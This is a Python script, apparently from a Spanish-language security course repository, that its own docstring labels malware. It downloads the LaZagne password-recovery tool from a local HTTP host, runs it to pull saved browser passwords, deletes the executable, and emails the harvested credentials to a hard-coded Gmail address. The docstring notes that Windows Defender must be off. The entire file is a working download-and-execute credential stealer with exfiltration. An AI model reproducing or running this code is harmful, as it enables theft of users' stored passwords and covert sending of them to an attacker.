86 lines
1.7 KiB
Python
86 lines
1.7 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
Malware - LaZagne
|
|
|
|
LaZagne.exe https://github.com/AlessandroZ/LaZagne
|
|
|
|
Este virus no se puede ejecutar con el Windows Defender activado.
|
|
|
|
Si lo desactivamos, LaZagne recogerá las contraseñas de los navegadores y lo
|
|
enviará por correoç
|
|
|
|
Algunas librerías necesitarán instalación si se ejecuta con python directamente.
|
|
|
|
"""
|
|
|
|
import dotenv
|
|
import os
|
|
import requests
|
|
import subprocess
|
|
import smtplib
|
|
import tempfile
|
|
from email.mime.text import MIMEText
|
|
|
|
|
|
def run_command(command):
|
|
"""
|
|
Ejecutor de comandos
|
|
"""
|
|
|
|
output_command = subprocess.check_output(command, shell=True)
|
|
|
|
return output_command.decode('cp850')
|
|
|
|
|
|
def send_email(subject, body, sender, recipients, password):
|
|
"""
|
|
Envia un email con el reporte configurado
|
|
"""
|
|
|
|
msg = MIMEText(body)
|
|
msg['Subject'] = subject
|
|
msg['From'] = sender
|
|
msg['To'] = ', '.join(recipients)
|
|
|
|
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
|
|
|
|
smtp_server.login(sender, password)
|
|
smtp_server.sendmail(sender, recipients, msg.as_string())
|
|
|
|
print(f"[i] Email sent Successfully!\n")
|
|
|
|
|
|
def download_and_execute_lazagne():
|
|
|
|
r = requests.get("http://192.168.1.120/LaZagne.exe")
|
|
|
|
temp_file = tempfile.mkdtemp()
|
|
|
|
os.chdir(temp_file)
|
|
|
|
with open("LaZagne.exe", "wb") as f:
|
|
|
|
f.write(r.content)
|
|
|
|
lazagne_output = run_command("LaZagne.exe browsers")
|
|
|
|
os.remove("LaZagne.exe")
|
|
|
|
return lazagne_output
|
|
|
|
|
|
if __name__ == '__main__':
|
|
|
|
output = download_and_execute_lazagne()
|
|
|
|
dotenv.load_dotenv()
|
|
app_passwd = os.getenv("APP_PASSWD")
|
|
|
|
send_email(
|
|
"LaZagne Browser INFO",
|
|
output,
|
|
"keyloggerseginf@gmail.com",
|
|
["keyloggerseginf@gmail.com"],
|
|
app_passwd
|
|
)
|